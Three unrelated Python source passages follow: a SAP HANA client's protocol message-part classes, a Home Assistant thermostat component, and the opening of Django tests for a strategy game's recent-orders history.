            row.append(by_type_code[param.datatype].from_resultset(self.payload))
        yield tuple(row)
class Error(Part):
    """Server-side error part; unpacks into DB-API exception instances."""
    kind = constants.part_kinds.ERROR
    part_struct = struct.Struct("iIIB5s")
    __tracing_attrs__ = Part.__tracing_attrs__ + ['errors']

    def __init__(self, errors):
        self.errors = errors

    @classmethod
    def unpack_data(cls, argument_count, payload):
        collected = []
        for _ in iter_range(argument_count):
            raw = payload.read(cls.part_struct.size)
            code, position, textlength, level, sqlstate = cls.part_struct.unpack(raw)
            message = payload.read(textlength).decode('utf-8')
            # SQL error code 301 == unique constraint violated.
            exc_class = IntegrityError if code == 301 else DatabaseError
            collected.append(exc_class(message, code))
        return tuple(collected),
class StatementId(Part):
    """8-byte identifier of a prepared statement."""
    kind = constants.part_kinds.STATEMENTID
    __tracing_attrs__ = Part.__tracing_attrs__ + ['statement_id']

    def __init__(self, statement_id):
        self.statement_id = statement_id

    def pack_data(self, remaining_size):
        # Single argument: the raw id, passed along as a byte buffer.
        return 1, bytearray(self.statement_id)

    @classmethod
    def unpack_data(cls, argument_count, payload):
        return payload.read(8),
class RowsAffected(Part):
    """Row counts (one little-endian int32 per statement) reported after
    executing DML."""
    kind = constants.part_kinds.ROWSAFFECTED
    __tracing_attrs__ = Part.__tracing_attrs__ + ['values']

    def __init__(self, values):
        self.values = values

    @classmethod
    def unpack_data(cls, argument_count, payload):
        counts = [struct.unpack("<i", payload.read(4))[0]
                  for _ in iter_range(argument_count)]
        return tuple(counts),
class ResultSetId(Part):
    """
    Identifier of an open result set (used by FETCH/CLOSE round trips).
    """
    kind = constants.part_kinds.RESULTSETID
    __tracing_attrs__ = Part.__tracing_attrs__ + ['value']

    def __init__(self, value):
        self.value = value

    def pack_data(self, remaining_size):
        # The raw id travels unchanged as a single argument.
        return 1, self.value

    @classmethod
    def unpack_data(cls, argument_count, payload):
        return payload.read(),
class TopologyInformation(Part):
    """Topology data sent by the server; currently accepted and ignored."""
    kind = constants.part_kinds.TOPOLOGYINFORMATION

    def __init__(self, *args):
        pass

    @classmethod
    def unpack_data(cls, argument_count, payload):
        # TODO: actually parse the topology payload
        return ()
class ReadLobRequest(Part):
    """Client request for a chunk of LOB data identified by a locator id."""
    kind = constants.part_kinds.READLOBREQUEST
    part_struct = struct.Struct(b'<8sQI4s')
    __tracing_attrs__ = Part.__tracing_attrs__ + ['locator_id', 'readoffset', 'readlength']

    def __init__(self, locator_id, readoffset, readlength):
        self.locator_id = locator_id
        self.readoffset = readoffset
        self.readlength = readlength

    def pack_data(self, remaining_size):
        """Pack data. readoffset has to be increased by one, seems like HANA starts from 1, not zero."""
        packed = self.part_struct.pack(self.locator_id, self.readoffset + 1,
                                       self.readlength, b' ')
        return 4, packed
class ReadLobReply(Part):
    """Server reply carrying (a chunk of) LOB data plus status flags."""
    kind = constants.part_kinds.READLOBREPLY
    part_struct_p1 = struct.Struct(b'<8sB')
    part_struct_p2 = struct.Struct(b'<I3s')
    __tracing_attrs__ = Part.__tracing_attrs__ + ['is_data_included', 'is_last_data', 'is_null']

    def __init__(self, data, is_data_included, is_last_data, is_null):
        self.data = data
        self.is_data_included = is_data_included
        self.is_last_data = is_last_data
        self.is_null = is_null

    @classmethod
    def unpack_data(cls, argument_count, payload):
        raw = payload.read(cls.part_struct_p1.size)
        locator_id, options = cls.part_struct_p1.unpack(raw)
        if options & ReadLobHeader.LOB_OPTION_ISNULL:
            # Returned LOB is NULL - no length/data fields follow.
            return None, None, None, True
        chunklength, _filler = cls.part_struct_p2.unpack(
            payload.read(cls.part_struct_p2.size))
        data_included = bool(options & ReadLobHeader.LOB_OPTION_DATAINCLUDED)
        lobdata = payload.read() if data_included else ''
        is_last = bool(options & ReadLobHeader.LOB_OPTION_LASTDATA)
        assert len(lobdata) == chunklength
        return lobdata, data_included, is_last, False
class WriteLobRequest(Part):
    """Write/Send LOB data to server"""
    kind = constants.part_kinds.WRITELOBREQUEST
    part_struct = struct.Struct(b'<8sBQI')   # B[8] I1 I8 I4
    __tracing_attrs__ = Part.__tracing_attrs__ + ['lob_buffers']

    def __init__(self, lob_buffers):
        """
        :param lob_buffers: a deque containing lob buffers to put into lob write requests
        """
        self.lob_buffers = lob_buffers
        assert lob_buffers, 'List of lob buffers must include at least one lob'

    # noinspection PyUnboundLocalVariable
    def pack_data(self, max_payload_size):
        """Fill this part with as many (possibly partial) LOBs as fit.

        Buffers are consumed from self.lob_buffers left to right; a buffer
        that fits only partially is pushed back for the next
        WRITELOBREQUEST round.  Returns (num_lobs_written, payload_bytes).
        """
        offset = 0   # a value of zero means: append lob data to existing LOB data in DB
        num_lobs = 0
        max_payload_size -= self.part_struct.size  # reduce by struct header size to simply math below
        payload = io.BytesIO()
        while payload.tell() < max_payload_size and self.lob_buffers:
            lb = self.lob_buffers.popleft()
            remaining_payload_size = max_payload_size - payload.tell()
            num_bytes_to_write = min(lb.num_bytes_to_write, remaining_payload_size)
            lob_options = WriteLobHeader.LOB_OPTION_DATAINCLUDED
            if num_bytes_to_write == lb.num_bytes_to_write:
                # i.e. the entire (rest of the) LOB will be written, so set LASTDATA flag:
                lob_options |= WriteLobHeader.LOB_OPTION_LASTDATA
            # Per-lob header (locator id, options, offset, chunk size) followed by the chunk:
            payload.write(self.part_struct.pack(lb.locator_id, lob_options, offset, num_bytes_to_write))
            payload.write(lb.encoded_data.read(num_bytes_to_write))
            num_lobs += 1
        # Since loop above was run at least once both 'lob_options' and 'lb' will be defined
        if not lob_options & WriteLobHeader.LOB_OPTION_LASTDATA:
            # last lob object was not written entirely -> put it back into lob_buffers for next round of writing:
            self.lob_buffers.appendleft(lb)
        return num_lobs, payload.getvalue()
class WriteLobReply(Part):
    """Received from HANA after inserting a partial LOB through an insert
    or select statement; carries the locator ids assigned to the LOBs."""
    kind = constants.part_kinds.WRITELOBREPLY
    part_struct = struct.Struct(b'<8sQI4s')
    __tracing_attrs__ = Part.__tracing_attrs__ + ['locator_ids']

    def __init__(self, locator_ids):
        self.locator_ids = locator_ids

    @classmethod
    def unpack_data(cls, argument_count, payload):
        """Split the raw payload into the list of 8-byte locator_ids.

        :param argument_count: number of locator_ids in payload
        :param payload: BytesIO instance holding the concatenated ids
        """
        raw = payload.read()
        ids = [raw[pos:pos + 8] for pos in range(0, len(raw), 8)]
        return ids,
class LobBuffer(object):
    """Wraps one LOB value destined for the server and tracks how much of
    its encoded data has already been written into messages."""

    def __init__(self, orig_data, DataType, lob_header_pos):
        self.orig_data = orig_data
        # Normalise to bytes: raw bytes pass through, text is encoded via
        # the column's DataType, anything else is assumed to be a LOB
        # instance providing encode().
        if isinstance(orig_data, byte_type):
            raw = orig_data
        elif isinstance(orig_data, string_types):
            raw = DataType.encode_value(orig_data)
        else:
            raw = orig_data.encode()
        self.encoded_data = io.BytesIO(raw)
        self.DataType = DataType
        self.lob_header_pos = lob_header_pos
        self.encoded_lob_size = len(raw)
        self.locator_id = None

    @property
    def num_bytes_to_write(self):
        """Bytes of this LOB not yet written into any message."""
        return self.encoded_lob_size - self.encoded_data.tell()
class Parameters(Part):
    """Prepared statement parameters' data """
    kind = constants.part_kinds.PARAMETERS
    __tracing_attrs__ = Part.__tracing_attrs__ + ['parameters']

    def __init__(self, parameters):
        """Initialize parameter part
        :param parameters: A generator producing lists (1 per row) of named tuples containing parameter meta
                           data and values (usually an instance of class 'cursor.PreparedStatement')
               Example: [Parameter(id=0, datatype=9, length=255, value='row2'), Parameter(id=1, ...), ]
        :returns: tuple (arguments_count, payload)
        """
        self.parameters = parameters
        # LOB buffers that did not fit into this part; they must follow in
        # separate WRITELOBREQUEST parts (filled in by pack_data()).
        self.unwritten_lobs = []

    def pack_data(self, remaining_size):
        """Pack as many parameter rows as fit into 'remaining_size' bytes.

        Returns (num_packed_rows, payload_bytes).  A row that does not fit
        is truncated from the buffer and pushed back into the parameter
        generator; LOB values are appended after the row's fixed fields.
        """
        payload = io.BytesIO()
        num_rows = 0
        for row_parameters in self.parameters:
            # Loop over all input row parameters.
            # Memorize start position of row in buffer if it has to be removed in case that
            # the maximum message size will be exceeded (see below)
            row_header_start_pos = payload.tell()
            row_lobs = []
            row_lob_size_sum = 0
            for parameter in row_parameters:
                # 'parameter' is a named tuple, created in PreparedStatement.prepare_parameters()
                type_code, value = parameter.type_code, parameter.value
                try:
                    _DataType = types.by_type_code[type_code]
                except KeyError:
                    raise InterfaceError("Prepared statement parameter datatype not supported: %d" % type_code)
                # NULL needs the type code; strings need it too (string-ish
                # types share one prepare()); everything else packs plainly.
                if value is None:
                    pfield = types.NoneType.prepare(type_code)
                elif type_code in types.String.type_code:
                    pfield = _DataType.prepare(value, type_code)
                else:
                    pfield = _DataType.prepare(value)
                if type_code in (types.BlobType.type_code, types.ClobType.type_code, types.NClobType.type_code):
                    # In case of value being a lob its actual data is not yet included in 'pfield' generated above.
                    # Instead the lob data needs to be appended at the end of the packed row data.
                    # Memorize the position of the lob header data (the 'pfield'):
                    lob_header_pos = payload.tell()
                    lob_buffer = LobBuffer(value, _DataType, lob_header_pos)
                    # Add length of lob data to the sum so we can see whether all data fits into a segment below:
                    row_lob_size_sum += lob_buffer.encoded_lob_size
                    # Append lob data so it can be appended once all data for the row is packed:
                    row_lobs.append(lob_buffer)
                payload.write(pfield)
            if payload.tell() >= remaining_size:
                # Last row (even without lobs) does not fit anymore into the current message! Remove it from payload
                # by resetting payload pointer to former position and truncate away last row data:
                payload.seek(row_header_start_pos)
                payload.truncate()
                self.parameters.back()  # make generator to go one step back, so same item will be delivered again
                # Check for case that a row does not fit at all into a part block (i.e. it is the first one):
                if num_rows == 0:
                    raise DataError('Parameter row too large to fit into execute statement.'
                                    'Got: %d bytes, allowed: %d bytes' %
                                    (payload.tell() + row_lob_size_sum, remaining_size))
                break  # jump out of loop - no more rows to be added!
            else:
                # Keep row data.
                num_rows += 1
                # Now append as much as possible of actual binary lob data after the end of all parameters of this row.
                # All those LOBs which were not or only partially written to the payload will be collected in
                # 'unwritten_lobs' for further LOBWRITEREQUESTs.
                self.unwritten_lobs = self.pack_lob_data(remaining_size, payload, row_header_start_pos, row_lobs)
                if payload.tell() >= remaining_size:
                    # all the rest of the segment is filled with lob data, no more rows can be added:
                    break
        return num_rows, payload.getvalue()

    @staticmethod
    def pack_lob_data(remaining_size, payload, row_header_start_pos, row_lobs):
        """
        After parameter row has been written, append the lobs and update the corresponding lob headers
        with lob position and lob size:
        :param payload: payload object (io.BytesIO instance)
        :param row_header_start_pos: absolute position of start position of row within payload
        :param row_lobs: list of row buffer instance (containing binary encoded lob data, header position and DataType)
        :returns: deque of LobBuffer instances not (fully) written yet
        """
        unwritten_lobs = collections.deque()
        for lob_buffer in row_lobs:
            # Calculate relative position of lob within the binary packed parameter row.
            # Add +1, Hana counts from 1, not 0!
            rel_lob_pos = payload.tell() - row_header_start_pos + 1
            # Calculate how much space is left in message for lob data:
            max_data_to_write = min(lob_buffer.encoded_lob_size, remaining_size - payload.tell())
            payload.write(lob_buffer.encoded_data.read(max_data_to_write))
            is_last_data = max_data_to_write == lob_buffer.encoded_lob_size
            if not is_last_data:
                # lob has not been written (partially or entirely) into message -> register for further write requests
                unwritten_lobs.append(lob_buffer)
            # Write position and size of lob data into lob header block:
            payload.seek(lob_buffer.lob_header_pos)
            payload.write(lob_buffer.DataType.prepare(None, length=max_data_to_write,
                                                      position=rel_lob_pos, is_last_data=is_last_data))
            # Set pointer back to end for further writing
            payload.seek(0, SEEK_END)
        return unwritten_lobs
class Authentication(Part):
    """Authentication part: the user name plus a mapping of authentication
    method name to method-specific data."""
    kind = constants.part_kinds.AUTHENTICATION
    __tracing_attrs__ = Part.__tracing_attrs__ + ['user', 'methods']

    def __init__(self, user, methods):
        self.user = user
        self.methods = methods

    def pack_data(self, remaining_size):
        # Serialise as a flat field list: user, method1, data1, method2, ...
        flat = [self.user]
        for name_and_data in self.methods.items():
            flat.extend(name_and_data)
        return 1, Fields.pack_data(flat)

    @classmethod
    def unpack_data(cls, argument_count, payload):
        fields = Fields.unpack_data(payload)
        # Even entries are method names, odd entries the per-method data.
        methods = dict(zip(fields[0::2], fields[1::2]))
        return None, methods
class ClientId(Part):
    # Part not documented in the protocol specification.
    kind = constants.part_kinds.CLIENTID
    __tracing_attrs__ = Part.__tracing_attrs__ + ['client_id']

    def __init__(self, client_id):
        self.client_id = client_id

    def pack_data(self, remaining_size):
        return 1, self.client_id.encode('utf-8')

    @classmethod
    def unpack_data(cls, argument_count, payload):
        # The id is capped at 2048 bytes on the wire.
        return payload.read(2048).decode('utf-8')
class StatementContext(Part):
    """Opaque statement context part; its contents are ignored for now."""
    kind = constants.part_kinds.STATEMENTCONTEXT

    def __init__(self, *args):
        pass

    @classmethod
    def unpack_data(cls, argument_count, payload):
        return ()
class FetchSize(Part):
    """Number of rows the server should return per FETCH round trip."""
    kind = constants.part_kinds.FETCHSIZE
    struct = struct.Struct('i')
    __tracing_attrs__ = Part.__tracing_attrs__ + ['size']

    def __init__(self, size):
        self.size = size

    def pack_data(self, remaining_size):
        packed = self.struct.pack(self.size)
        return 1, packed

    @classmethod
    def unpack_data(cls, argument_count, payload):
        return cls.struct.unpack(payload.read())
class ParameterMetadata(Part):
    """Metadata describing the parameters of a prepared statement."""
    kind = constants.part_kinds.PARAMETERMETADATA
    __tracing_attrs__ = Part.__tracing_attrs__ + ['values']

    def __init__(self, values):
        self.values = values

    @classmethod
    def unpack_data(cls, argument_count, payload):
        """Unpack one 16-byte descriptor per parameter.

        Descriptor layout: mode, datatype, iotype, filler, name offset
        (0xffffffff == unnamed), length, fraction, filler.  Parameter names
        live after the fixed-size descriptor table as a 1-byte length
        followed by that many UTF-8 bytes.
        """
        values = []
        param_md_tuple = namedtuple('ParameterMetadata', 'mode datatype iotype id length fraction')
        # read parameter metadata - names start after the descriptor table
        text_offset = 16 * argument_count
        for i in iter_range(argument_count):
            mode, datatype, iotype, filler1, name_offset, length, fraction, filler2 = \
                struct.unpack("bbbbIhhI", payload.read(16))
            if name_offset == 0xffffffff:
                # Unnamed parameter: its position serves as the id.
                param_id = i
            else:
                # Jump to the name, read it, then restore the read position.
                # Bug fix: the name length used to be read into 'length',
                # clobbering the parameter's declared length in the tuple
                # below; a separate local is used now.
                current_pos = payload.tell()
                payload.seek(text_offset + name_offset)
                name_length = ord(payload.read(1))
                param_id = payload.read(name_length).decode('utf-8')
                payload.seek(current_pos)
            values.append(param_md_tuple(mode, datatype, iotype, param_id, length, fraction))
        return tuple(values),
class ResultSetMetaData(Part):
    """Column metadata of a result set."""
    kind = constants.part_kinds.RESULTSETMETADATA
    __tracing_attrs__ = Part.__tracing_attrs__ + ['columns']

    def __init__(self, columns):
        self.columns = columns

    @classmethod
    def unpack_data(cls, argument_count, payload):
        # First pass: one fixed-size 24-byte descriptor per column.
        columns = [list(struct.unpack('bbhhhIIII', payload.read(24)))
                   for _ in iter_range(argument_count)]
        text_base = payload.tell()
        # Second pass: resolve the four trailing name-offset slots (5..8);
        # the sentinel 0xffffffff (4294967295) marks an absent name.  Each
        # name is a 1-byte length followed by UTF-8 bytes.
        for column in columns:
            for slot in iter_range(5, 9):
                if column[slot] == 4294967295:
                    column[slot] = None
                    continue
                payload.seek(text_base + column[slot], 0)
                name_len, = struct.unpack('B', payload.read(1))
                column[slot] = payload.read(name_len).decode('utf-8')
        return tuple(tuple(col) for col in columns),
class OptionPartMeta(PartMeta):
    """Extends PartMeta with a reverse lookup table (wire identifier ->
    option name) derived from the subclass' ``option_definition``."""

    def __new__(mcs, name, bases, attrs):
        option_cls = super(OptionPartMeta, mcs).__new__(mcs, name, bases, attrs)
        if hasattr(option_cls, "option_definition"):
            option_cls.option_identifier = dict(
                (value[0], option)
                for option, value in option_cls.option_definition.items())
        return option_cls
class OptionPart(with_metaclass(OptionPartMeta, Part)):
    """
    The multi-line option part format is a common format to transmit
    collections of options (typed key-value pairs).  Each option is a
    (key byte, type byte) pair followed by a type-dependent value.
    """

    __metaclass__ = OptionPartMeta

    # struct format characters for the fixed-size option value types
    _INT_FORMATS = {1: 'B', 2: 'h', 3: 'i', 4: 'q', 28: '?'}

    def __init__(self, options):
        self.options = options

    def pack_data(self, remaining_size):
        payload = b""
        arguments = 0
        for option, value in self.options.items():
            try:
                key, typ = self.option_definition[option]
            except KeyError:
                raise InterfaceError("Unknown option identifier %s" % option)
            if value is None:
                continue  # unset options are simply omitted
            if typ in self._INT_FORMATS:
                encoded = struct.pack(self._INT_FORMATS[typ], value)
            elif typ == 29 or typ == 30:
                # length-prefixed UTF-8 string
                encoded = value.encode('utf-8')
                encoded = struct.pack('h', len(encoded)) + encoded
            else:
                raise Exception("Unknown option type %s" % typ)
            arguments += 1
            payload += struct.pack('bb', key, typ) + encoded
        return arguments, payload

    @classmethod
    def unpack_data(cls, argument_count, payload):
        options = {}
        for _ in iter_range(argument_count):
            key, typ = struct.unpack('bb', payload.read(2))
            # Unknown identifiers are kept under a synthetic name.
            key = cls.option_identifier.get(key, 'Unknown_%d' % key)
            if typ in cls._INT_FORMATS:
                fmt = cls._INT_FORMATS[typ]
                value = struct.unpack(fmt, payload.read(struct.calcsize(fmt)))[0]
            elif typ == 29 or typ == 30:
                str_length = struct.unpack('h', payload.read(2))[0]
                value = payload.read(str_length).decode('utf-8')
            elif typ == 24:
                # TODO: Handle type 24
                continue
            else:
                raise Exception("Unknown option type %s" % typ)
            options[key] = value
        return options,
class ConnectOptions(OptionPart):
    # Options exchanged with the server during CONNECT.  Each entry maps a
    # symbolic option name to (wire identifier, type code); type codes are
    # interpreted by OptionPart (3 = int32, 28 = bool, 29 = string).
    kind = constants.part_kinds.CONNECTOPTIONS
    option_definition = {
        # Identifier, (Value, Type)
        "connection_id": (1, 3),
        "complete_array_execution": (2, 28),
        "client_locale": (3, 29),
        "supports_large_bulk_operations": (4, 28),
        "large_number_of_parameters_support": (10, 28),
        "system_id": (11, 29),
        "data_format_version": (12, 3),
        "select_for_update_supported": (14, 28),
        "client_distribution_mode": (15, 3),
        "engine_data_format_version": (16, 3),
        "distribution_protocol_version": (17, 3),
        "split_batch_commands": (18, 28),
        "use_transaction_flags_only": (19, 28),
        "row_and_column_optimized_format": (20, 28),
        "ignore_unknown_parts": (21, 28),
        "data_format_version2": (23, 3)
    }
class TransactionFlags(OptionPart):
    # Transaction state flags reported by the server.  Each entry maps a
    # symbolic option name to (wire identifier, type code); type codes are
    # interpreted by OptionPart (3 = int32, 28 = bool).
    kind = constants.part_kinds.TRANSACTIONFLAGS
    option_definition = {
        # Identifier, (Value, Type)
        "rolledback": (0, 28),
        "commited": (1, 28),  # [sic] key name kept - callers look it up by this spelling
        "new_isolation_level": (2, 3),
        "ddl_commit_mode_changed": (3, 28),
        "write_transaction_started": (4, 28),
        "no_write_transaction_started": (5, 28),
        "session_closing_transaction_error": (6, 28)
    }
| |
"""
homeassistant.components.thermostat
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Provides functionality to interact with thermostats.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/thermostat/
"""
import logging
import os
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.config import load_yaml_config_file
import homeassistant.util as util
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.temperature import convert
from homeassistant.components import (ecobee, zwave)
from homeassistant.const import (
ATTR_ENTITY_ID, ATTR_TEMPERATURE, STATE_ON, STATE_OFF, STATE_UNKNOWN,
TEMP_CELCIUS)
DOMAIN = "thermostat"
ENTITY_ID_FORMAT = DOMAIN + ".{}"
# Seconds between polls of thermostat platforms.
SCAN_INTERVAL = 60
# Service names registered by setup().
SERVICE_SET_AWAY_MODE = "set_away_mode"
SERVICE_SET_TEMPERATURE = "set_temperature"
SERVICE_SET_FAN_MODE = "set_fan_mode"
# Operation states reported by ThermostatDevice.operation.
STATE_HEAT = "heat"
STATE_COOL = "cool"
STATE_IDLE = "idle"
# State attribute keys exposed via ThermostatDevice.state_attributes.
ATTR_CURRENT_TEMPERATURE = "current_temperature"
ATTR_AWAY_MODE = "away_mode"
ATTR_FAN = "fan"
ATTR_MAX_TEMP = "max_temp"
ATTR_MIN_TEMP = "min_temp"
ATTR_TEMPERATURE_LOW = "target_temp_low"
ATTR_TEMPERATURE_HIGH = "target_temp_high"
ATTR_OPERATION = "current_operation"
_LOGGER = logging.getLogger(__name__)
# Maps discovery info from other components to the platform handling it.
DISCOVERY_PLATFORMS = {
    ecobee.DISCOVER_THERMOSTAT: 'ecobee',
    zwave.DISCOVER_THERMOSTATS: 'zwave'
}
def set_away_mode(hass, away_mode, entity_id=None):
    """ Turn all or specified thermostat away mode on. """
    service_data = {ATTR_AWAY_MODE: away_mode}
    if entity_id:
        service_data[ATTR_ENTITY_ID] = entity_id
    hass.services.call(DOMAIN, SERVICE_SET_AWAY_MODE, service_data)
def set_temperature(hass, temperature, entity_id=None):
    """ Set new target temperature. """
    service_data = {ATTR_TEMPERATURE: temperature}
    if entity_id is not None:
        service_data[ATTR_ENTITY_ID] = entity_id
    hass.services.call(DOMAIN, SERVICE_SET_TEMPERATURE, service_data)
def set_fan_mode(hass, fan_mode, entity_id=None):
    """ Turn all or specified thermostat fan mode on. """
    service_data = {ATTR_FAN: fan_mode}
    if entity_id:
        service_data[ATTR_ENTITY_ID] = entity_id
    hass.services.call(DOMAIN, SERVICE_SET_FAN_MODE, service_data)
# pylint: disable=too-many-branches
def setup(hass, config):
    """ Setup thermostats.

    Sets up the platform entities and registers the away-mode, temperature
    and fan-mode services.  Returns True on success.
    """
    component = EntityComponent(_LOGGER, DOMAIN, hass,
                                SCAN_INTERVAL, DISCOVERY_PLATFORMS)
    component.setup(config)

    # Per-service descriptions for the service registry.
    descriptions = load_yaml_config_file(
        os.path.join(os.path.dirname(__file__), 'services.yaml'))

    def away_mode_set_service(service):
        """ Set away mode on target thermostats """
        target_thermostats = component.extract_from_service(service)
        away_mode = service.data.get(ATTR_AWAY_MODE)
        # Missing attribute is an error; the service call is dropped.
        if away_mode is None:
            _LOGGER.error(
                "Received call to %s without attribute %s",
                SERVICE_SET_AWAY_MODE, ATTR_AWAY_MODE)
            return
        for thermostat in target_thermostats:
            if away_mode:
                thermostat.turn_away_mode_on()
            else:
                thermostat.turn_away_mode_off()
            # Force an immediate state refresh after the change.
            thermostat.update_ha_state(True)

    hass.services.register(
        DOMAIN, SERVICE_SET_AWAY_MODE, away_mode_set_service,
        descriptions.get(SERVICE_SET_AWAY_MODE))

    def temperature_set_service(service):
        """ Set temperature on the target thermostats """
        target_thermostats = component.extract_from_service(service)
        # Coerce to float; non-numeric values yield None and are ignored.
        temperature = util.convert(
            service.data.get(ATTR_TEMPERATURE), float)
        if temperature is None:
            return
        for thermostat in target_thermostats:
            # Convert from the user's configured unit into the platform's.
            thermostat.set_temperature(convert(
                temperature, hass.config.temperature_unit,
                thermostat.unit_of_measurement))
            thermostat.update_ha_state(True)

    hass.services.register(
        DOMAIN, SERVICE_SET_TEMPERATURE, temperature_set_service,
        descriptions.get(SERVICE_SET_TEMPERATURE))

    def fan_mode_set_service(service):
        """ Set fan mode on target thermostats """
        target_thermostats = component.extract_from_service(service)
        fan_mode = service.data.get(ATTR_FAN)
        # Missing attribute is an error; the service call is dropped.
        if fan_mode is None:
            _LOGGER.error(
                "Received call to %s without attribute %s",
                SERVICE_SET_FAN_MODE, ATTR_FAN)
            return
        for thermostat in target_thermostats:
            if fan_mode:
                thermostat.turn_fan_on()
            else:
                thermostat.turn_fan_off()
            thermostat.update_ha_state(True)

    hass.services.register(
        DOMAIN, SERVICE_SET_FAN_MODE, fan_mode_set_service,
        descriptions.get(SERVICE_SET_FAN_MODE))

    return True
class ThermostatDevice(Entity):
""" Represents a thermostat within Home Assistant. """
# pylint: disable=no-self-use
@property
def state(self):
""" Returns the current state. """
return self.target_temperature or STATE_UNKNOWN
@property
def state_attributes(self):
""" Returns optional state attributes. """
data = {
ATTR_CURRENT_TEMPERATURE:
self._convert(self.current_temperature, 1),
ATTR_MIN_TEMP: self._convert(self.min_temp, 1),
ATTR_MAX_TEMP: self._convert(self.max_temp, 1),
ATTR_TEMPERATURE: self._convert(self.target_temperature, 1),
ATTR_TEMPERATURE_LOW:
self._convert(self.target_temperature_low, 1),
ATTR_TEMPERATURE_HIGH:
self._convert(self.target_temperature_high, 1),
}
operation = self.operation
if operation is not None:
data[ATTR_OPERATION] = operation
is_away = self.is_away_mode_on
if is_away is not None:
data[ATTR_AWAY_MODE] = STATE_ON if is_away else STATE_OFF
is_fan_on = self.is_fan_on
if is_fan_on is not None:
data[ATTR_FAN] = STATE_ON if is_fan_on else STATE_OFF
return data
@property
def unit_of_measurement(self):
""" Unit of measurement this thermostat expresses itself in. """
raise NotImplementedError
@property
def current_temperature(self):
""" Returns the current temperature. """
raise NotImplementedError
@property
def operation(self):
""" Returns current operation ie. heat, cool, idle """
return None
@property
def target_temperature(self):
""" Returns the temperature we try to reach. """
raise NotImplementedError
@property
def target_temperature_low(self):
""" Returns the lower bound temperature we try to reach. """
return self.target_temperature
@property
def target_temperature_high(self):
""" Returns the upper bound temperature we try to reach. """
return self.target_temperature
@property
def is_away_mode_on(self):
"""
Returns if away mode is on.
Return None if no away mode available.
"""
return None
@property
def is_fan_on(self):
"""
Returns if the fan is on
Return None if not available.
"""
return None
def set_temperate(self, temperature):
""" Set new target temperature. """
pass
def turn_away_mode_on(self):
""" Turns away mode on. """
pass
    def turn_away_mode_off(self):
        """ Turns away mode off. No-op unless overridden. """
        pass
    def turn_fan_on(self):
        """ Turns fan on. No-op unless overridden. """
        pass
    def turn_fan_off(self):
        """ Turns fan off. No-op unless overridden. """
        pass
    @property
    def min_temp(self):
        """ Return minimum temperature (7 degrees Celsius converted into
        this thermostat's unit of measurement). """
        return round(convert(7, TEMP_CELCIUS, self.unit_of_measurement))
    @property
    def max_temp(self):
        """ Return maximum temperature (35 degrees Celsius converted into
        this thermostat's unit of measurement). """
        return round(convert(35, TEMP_CELCIUS, self.unit_of_measurement))
    def _convert(self, temp, round_dec=None):
        """ Convert temperature from this thermostat's unit into the
        user's preferred temperature unit.

        :param temp: temperature value, or None (passed through).
        :param round_dec: number of decimals to round to; None means no
            rounding.
        """
        if temp is None:
            return None
        value = convert(temp, self.unit_of_measurement,
                        self.hass.config.temperature_unit)
        return value if round_dec is None else round(value, round_dec)
| |
from django.test import TestCase
from django.utils import six
from .. import models
from . import factories
if six.PY2:
    # Python 2's TestCase names this assertItemsEqual; patch in six's
    # portable implementation so tests can use assertCountEqual everywhere.
    TestCase.assertCountEqual = six.assertCountEqual
class TurnTest(TestCase):
    """Tests for Turn.recent_orders() across the season cycle.

    Each test builds a sequence of turns (seasons 'S' spring, 'SR' spring
    retreat, 'F' fall, 'FR' fall retreat, 'FA' fall adjustment) with units
    and canonical orders for a single government, then checks which orders
    recent_orders() reports, grouped by power and by acting unit.
    """
    def setUp(self):
        # A newly-started game with a full set of seven governments.
        self.game = factories.GameFactory(state='S')
        for x in range(7):
            factories.GovernmentFactory(game=self.game)
        self.assertTrue(self.game.activate())
    def test_recent_orders_spring(self):
        """From a spring turn, history reaches back through the previous
        fall movement for each unit (builds use the 'b.' actor prefix)."""
        gvt = models.Government.objects.all()[0]
        t = factories.TurnFactory(game=self.game, year=1900, season='SR')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='paris.l', previous='burgundy.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='S',
            actor='paris.l', action='M', target='gascony.l')
        t = factories.TurnFactory(game=self.game, year=1900, season='F')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='gascony.l', previous='paris.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='S',
            actor='gascony.l', action='M', target='marseilles.l')
        t = factories.TurnFactory(game=self.game, year=1900, season='FR')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='marseilles.l', previous='gascony.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='S',
            actor='marseilles.l', action='M', target='piedmont.l')
        t = factories.TurnFactory(game=self.game, year=1900, season='FA')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='piedmont.l', previous='marseilles.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='S',
            actor='brest.l', action='B')
        t = factories.TurnFactory(game=self.game, year=1901, season='S')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='brest.l', previous='')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='piedmont.l', previous='piedmont.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='S',
            actor='brest.l', action='M', target='picardy.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='S',
            actor='piedmont.l', action='M', target='tuscany.l')
        recent = t.recent_orders()
        self.assertEqual(len(recent), 1)
        power, orders = recent[0]
        self.assertEqual(power, gvt.power_display)
        self.assertEqual(len(orders), 2)
        (actor1, orders1), (actor2, orders2) = orders
        self.assertCountEqual([actor1, actor2], ['b.brest.l', 'gascony.l'])
        orders = {actor1: orders1, actor2: orders2}
        self.assertEqual([(o.turn.season, o.turn.year) for o in orders['b.brest.l']],
                         [('FA', 1900)])
        self.assertEqual([(o.turn.season, o.turn.year) for o in orders['gascony.l']],
                         [('F', 1900), ('FR', 1900)])
    def test_recent_orders_spring_retreat(self):
        """From a spring-retreat turn, only the spring orders (including a
        failed/bounced one) are reported for each unit."""
        gvt = models.Government.objects.all()[0]
        t = factories.TurnFactory(game=self.game, year=1900, season='FA')
        factories.UnitFactory(
            turn=t, government=gvt, u_type='A',
            subregion='piedmont.l', previous='marseilles.l')
        factories.CanonicalOrderFactory(
            turn=t, government=gvt, result='S',
